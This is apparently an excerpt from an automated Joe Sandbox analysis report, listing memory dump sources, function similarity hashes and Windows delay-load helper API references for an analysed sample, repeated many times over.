• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 22a95a687433ac4a39de92300cb71cc68d50c453b9a9053e416d87192ae182d8
• Instruction ID: 39f220e69f4edab7fd46c53cb1ac37455752d3aa0127adb2758659707d431553
• Opcode Fuzzy Hash: 22a95a687433ac4a39de92300cb71cc68d50c453b9a9053e416d87192ae182d8
• Instruction Fuzzy Hash: 8CB012C175D2097D310451541C03D77019DC4C1B1C331852EFC04D1080E8500C810935
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e38ba3ed2a7989f5f8da1213548694ec6588ba90305e7fd98ffe40ca173a2672
• Instruction ID: 49b23498c6240a71be44842318eedf8188b74f7329791d9d165ea132347a851c
• Opcode Fuzzy Hash: e38ba3ed2a7989f5f8da1213548694ec6588ba90305e7fd98ffe40ca173a2672
• Instruction Fuzzy Hash: D2B012C175C3057D314451545C03D7701BDC4C1B1C331862EFC04D1080E8400CC10935
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 12871f0352d874ccba20d40ccc402bc454117ad82e495ed930cbecbdfdd30059
• Instruction ID: 73b93e3698b3553fc7b02122e78a524a6818e365c43752742d839f72cbf2b918
• Opcode Fuzzy Hash: 12871f0352d874ccba20d40ccc402bc454117ad82e495ed930cbecbdfdd30059
• Instruction Fuzzy Hash: B4B012C175C2057C310451545D03D7741BDC4C1B1C371862EFC04D1080EC400D820935
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e22f47f7042ea2484cbc9e296d7d87c1318a6d52441229bdd67b354612e04016
• Instruction ID: 97e53b81f3fa8278587992bee9530340b786054d4ed5adfc8dabcdd696f77a4b
• Opcode Fuzzy Hash: e22f47f7042ea2484cbc9e296d7d87c1318a6d52441229bdd67b354612e04016
• Instruction Fuzzy Hash: 38B012C135C5057C310412241C07D7B011DC4C1F18730943EFC11D04C1A8400D890931
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 34df6a04c801084c0b2ccf57d3249bce9ee91424b588a203be45dd55402783a6
• Instruction ID: 4c5721306b2f26504e7d1cb737de1ec2ebe012b16bf68f373781e56baa600c5d
• Opcode Fuzzy Hash: 34df6a04c801084c0b2ccf57d3249bce9ee91424b588a203be45dd55402783a6
• Instruction Fuzzy Hash: 57B012C135E5057D350452081C03E7B015DC4C1F18330852EFC05C0080E8500C850A31
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 00a141cabe078e4ed5cddbd22970a085d3c9f373941807d55bba775212a404da
• Instruction ID: 59f0f57303cead9c820328f842cd9e381cb73f94738be60f1e6d5ebd1dec60e4
• Opcode Fuzzy Hash: 00a141cabe078e4ed5cddbd22970a085d3c9f373941807d55bba775212a404da
• Instruction Fuzzy Hash: 49B012C13595457C350452081D03D7B055DC4C1F18330C52EFC05C0080E8500C860A31
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 4542904104e88c6f91b7f9cdae29398db75b94aba50e1fed53d5441aba69d924
• Instruction ID: fd6bc3c5526e650a0acfffece7c4574fc4481e19b1f2a0b59450cf35b8304604
• Opcode Fuzzy Hash: 4542904104e88c6f91b7f9cdae29398db75b94aba50e1fed53d5441aba69d924
• Instruction Fuzzy Hash: 2BB012C13586057C320452085C03D7B016DC4C1F18330862EFC05C0080E8400CC90A31
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ce97c7123928960182b799a19b6684a386271e7d31a9fd7c6758a1b8a523114e
• Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
• Opcode Fuzzy Hash: ce97c7123928960182b799a19b6684a386271e7d31a9fd7c6758a1b8a523114e
• Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 2c909e2fa2fdca16e50d4c27b8e8b3729e2c57e08bb737752bc39cd2decba25b
• Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
• Opcode Fuzzy Hash: 2c909e2fa2fdca16e50d4c27b8e8b3729e2c57e08bb737752bc39cd2decba25b
• Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 671c13707842423eb599007def84c7a81d418b91874dda2c799a908a6873e4d0
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 671c13707842423eb599007def84c7a81d418b91874dda2c799a908a6873e4d0
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: f171abd8aa34ca4ebb1ac627e97d2f3c0cd90de209824c0c7656ea32157bead6
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: f171abd8aa34ca4ebb1ac627e97d2f3c0cd90de209824c0c7656ea32157bead6
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: df0071db2916c9b39f20f058f50981ac7d80b96ce8a8deb40b4408dcf93dc5d2
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: df0071db2916c9b39f20f058f50981ac7d80b96ce8a8deb40b4408dcf93dc5d2
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 509a2762673aa7d27e45267166cc5b0d48286efcc72216fd131af4cd673d3acd
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 509a2762673aa7d27e45267166cc5b0d48286efcc72216fd131af4cd673d3acd
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: ee9bab09cfa619d8f1d6490e21d22ba10b9edcdd46088eb0739e02bd439b525f
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: ee9bab09cfa619d8f1d6490e21d22ba10b9edcdd46088eb0739e02bd439b525f
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: f123e20cabcf0ab6f379d92443693108b682c5251cfc14c26107a847770f9118
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: f123e20cabcf0ab6f379d92443693108b682c5251cfc14c26107a847770f9118
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 96c2d16a36afd9bfcadfbe39356eb7461d4ef3fc22d9353e02390356a920d9b4
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 96c2d16a36afd9bfcadfbe39356eb7461d4ef3fc22d9353e02390356a920d9b4
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
